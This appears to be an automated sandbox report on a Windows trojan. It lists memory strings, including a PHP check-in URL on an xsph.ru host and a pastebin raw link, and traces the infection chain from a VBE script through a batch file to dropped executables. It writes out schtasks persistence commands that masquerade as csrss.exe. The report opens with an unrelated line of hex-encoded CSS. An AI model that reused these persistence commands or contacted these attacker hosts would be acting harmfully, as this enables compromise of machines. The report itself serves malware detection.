30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003203000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1068999.xsph.ru
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1068999.xsph.ru/
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003203000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInw
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
            Source: serverwinCommon.exe, 00000004.00000002.1697465797.0000000002558000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/GTMsT9mi
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 19.2.MImOLbdPzolqACtrpVpcRPdPWZg.exe.30b6270.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0037718C
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile created: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile created: C:\Windows\TAPI\8a9d991feea8c9Jump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037857B0_2_0037857B
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039D00E0_2_0039D00E
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037407E0_2_0037407E
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003870BF0_2_003870BF
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003A11940_2_003A1194
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037E2A00_2_0037E2A0
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003732810_2_00373281
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003902F60_2_003902F6
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003866460_2_00386646
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039473A0_2_0039473A
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039070E0_2_0039070E
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003727E80_2_003727E8
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003837C10_2_003837C1
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037E8A00_2_0037E8A0
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_003949690_2_00394969
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037F9680_2_0037F968
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00383A3C0_2_00383A3C
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00386A7B0_2_00386A7B
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039CB600_2_0039CB60
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00390B430_2_00390B43
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00385C770_2_00385C77
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037ED140_2_0037ED14
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00383D6D0_2_00383D6D
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038FDFA0_2_0038FDFA
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037BE130_2_0037BE13
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037DE6C0_2_0037DE6C
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00375F3C0_2_00375F3C
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00390F780_2_00390F78
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B7655F24_2_00007FFD9B7655F2
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B7535054_2_00007FFD9B753505
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B7571A84_2_00007FFD9B7571A8
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B7535854_2_00007FFD9B753585
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B78358519_2_00007FFD9B783585
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B7871A819_2_00007FFD9B7871A8
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B79570519_2_00007FFD9B795705
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B76350520_2_00007FFD9B763505
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B76358520_2_00007FFD9B763585
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B7671A820_2_00007FFD9B7671A8
            Source: C:\Recovery\csrss.exeCode function: 21_2_00007FFD9B78358521_2_00007FFD9B783585
            Source: C:\Recovery\csrss.exeCode function: 21_2_00007FFD9B7871A821_2_00007FFD9B7871A8
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: String function: 0038E360 appears 52 times
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: String function: 0038ED00 appears 31 times
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: String function: 0038E28C appears 35 times
            Source: serverwinCommon.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: MImOLbdPzolqACtrpVpcRPdPWZg.exe0.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: CRf9KBk4ra.exe, 00000000.00000003.1653000928.00000000048BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs CRf9KBk4ra.exe
            Source: CRf9KBk4ra.exe, 00000000.00000003.1651695834.0000000005F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs CRf9KBk4ra.exe
            Source: CRf9KBk4ra.exe, 00000000.00000003.1653368504.00000000048B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs CRf9KBk4ra.exe
            Source: CRf9KBk4ra.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs CRf9KBk4ra.exe
            Source: CRf9KBk4ra.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 19.2.MImOLbdPzolqACtrpVpcRPdPWZg.exe.30b6270.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, T7OMDiCNENbut1hHnNT.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, T7OMDiCNENbut1hHnNT.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, bGeLc7yAZVlHn8e8GhO.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, bGeLc7yAZVlHn8e8GhO.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, T7OMDiCNENbut1hHnNT.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, T7OMDiCNENbut1hHnNT.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, bGeLc7yAZVlHn8e8GhO.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, bGeLc7yAZVlHn8e8GhO.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, FKCilMlMTmDTN6rC22q.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, FKCilMlMTmDTN6rC22q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, FKCilMlMTmDTN6rC22q.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, FKCilMlMTmDTN6rC22q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@27/14@2/2
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00376EC9 GetLastError,FormatMessageW,0_2_00376EC9
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_00389E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00389E1C
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\serverwinCommon.exe.logJump to behavior
            Source: C:\Recovery\csrss.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeMutant created: \Sessions\1\BaseNamedObjects\Local\4808a2bbcf6b411f06b29daa2c9b3ce17378b964
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile created: C:\Users\user\AppData\Local\Temp\YjY3J8VZ1hJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" "
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCommand line argument: sfxname0_2_0038D5D4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCommand line argument: sfxstime0_2_0038D5D4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCommand line argument: STARTDLG0_2_0038D5D4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCommand line argument: xj<0_2_0038D5D4
            Source: CRf9KBk4ra.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: CRf9KBk4ra.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: CRf9KBk4ra.exeReversingLabs: Detection: 71%
            Source: CRf9KBk4ra.exeVirustotal: Detection: 57%
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeFile read: C:\Users\user\Desktop\CRf9KBk4ra.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CRf9KBk4ra.exe "C:\Users\user\Desktop\CRf9KBk4ra.exe"
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperBrowsermonitorNet\serverwinCommon.exe "C:\hyperBrowsermonitorNet\serverwinCommon.exe"
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 5 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\csrss.exe'" /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZg" /sc ONLOGON /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MImOLbdPzolqACtrpVpcRPdPWZgM" /sc MINUTE /mo 12 /tr "'C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe'" /rl HIGHEST /f
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
            Source: unknownProcess created: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe"
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperBrowsermonitorNet\serverwinCommon.exe "C:\hyperBrowsermonitorNet\serverwinCommon.exe"Jump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" Jump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: policymanager.dllJump to behavior
